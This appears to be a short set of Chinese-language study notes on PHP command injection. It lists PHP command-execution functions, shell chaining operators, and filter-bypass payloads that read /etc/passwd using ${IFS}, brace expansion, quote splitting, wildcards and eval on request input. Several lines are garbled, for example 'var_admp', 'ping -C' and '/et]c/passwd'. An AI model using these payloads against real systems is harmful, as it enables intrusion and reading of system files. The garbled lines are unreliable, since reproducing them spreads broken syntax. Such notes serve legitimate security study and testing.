1、系统命令执行函数
(1)system()
(2)exec()
(3)shell_exec()
(4)passthru()
(5)popen()
(6)var_admp($_REQUEST[cmd])y
2、命令拼接符号
(1)system('ping -C $ip');
执行多条命令
(2);分号
不管前面的命令是否执行,后面的命令都会按顺序执行
(3)&
和分号类似
(4)&&
只有前面的命令执行成功才执行后面的命令
(5)||
只有前面的命令执行失败,才会执行后面的命令
(6)|
管道符,前面命令的输出作为后面命令的输入
(7) 、 、 、 、 ....
3、条件过滤方式
(1)空格
代码语言:shell复制${IFS} #cat${IFS}/etc/passwd
$IFS$9 #cat$IFS$9/etc/passwd
#cat /etc/passwd
<> #cat<>/etc/passwd
< #cat</etc/passwd
, # {cat,/et]c/passwd}
()(2)关键字
代码语言:shell复制续行符 #cat
引号 #ca''t
单个匹配符 #/bin/c?t
多个匹配符 #/bin/c*t
正则匹配 /bin/c[ab]t命令通配符 ca? 无效 /bin/ca? 有效
(3)常见操作
eval函数 #eval($_REQUESTcmd) eval("666".$_REQUESTcmd."999")
(4)无回显
代码语言:shell复制>a #输出到a文件
>>b #追加(5)长度限制(nl)
echo 一段一段追加到指定文件
